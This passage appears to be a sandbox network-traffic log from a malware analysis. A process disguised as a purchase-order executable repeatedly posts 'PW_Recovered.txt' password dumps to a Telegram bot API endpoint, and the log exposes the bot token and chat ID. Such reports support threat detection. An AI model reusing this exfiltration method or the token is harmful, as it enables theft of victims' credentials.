2024-12-16 13:15:50 UTC	530	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17213,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354950,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49888	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:51 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd27d1a9bd81ef Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:51 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 37 64 31 61 39 62 64 38 31 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd27d1a9bd81efContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:52 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:52 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17215,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354952,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49894	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:53 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd2a320255e51f Host: api.telegram.org Content-Length: 581
2024-12-16 13:15:53 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 61 33 32 30 32 35 35 65 35 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd2a320255e51fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:54 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:54 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17217,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354954,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49899	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:55 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd2caa9038df06 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:55 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 63 61 61 39 30 33 38 64 66 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd2caa9038df06Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:56 GMT Content-Type: application/json Content-Length: 530 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:56 UTC	530	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17219,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354956,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49902	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:57 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd2d63b3185ce7 Host: api.telegram.org Content-Length: 581
2024-12-16 13:15:57 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 36 33 62 33 31 38 35 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd2d63b3185ce7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:58 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:58 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17221,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354958,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49908	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:59 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd2fc9ba88ec0f Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:59 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 39 62 61 38 38 65 63 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd2fc9ba88ec0fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:00 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:59 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:00 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17223,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354959,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49914	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:01 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd30609e76b5a6 Host: api.telegram.org Content-Length: 581
2024-12-16 13:16:01 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 30 36 30 39 65 37 36 62 35 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd30609e76b5a6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:02 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:01 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:02 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17225,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354961,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49920	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:03 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd31135be8a6fd Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:16:03 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 31 33 35 62 65 38 61 36 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd31135be8a6fdContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:04 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:03 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:04 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: 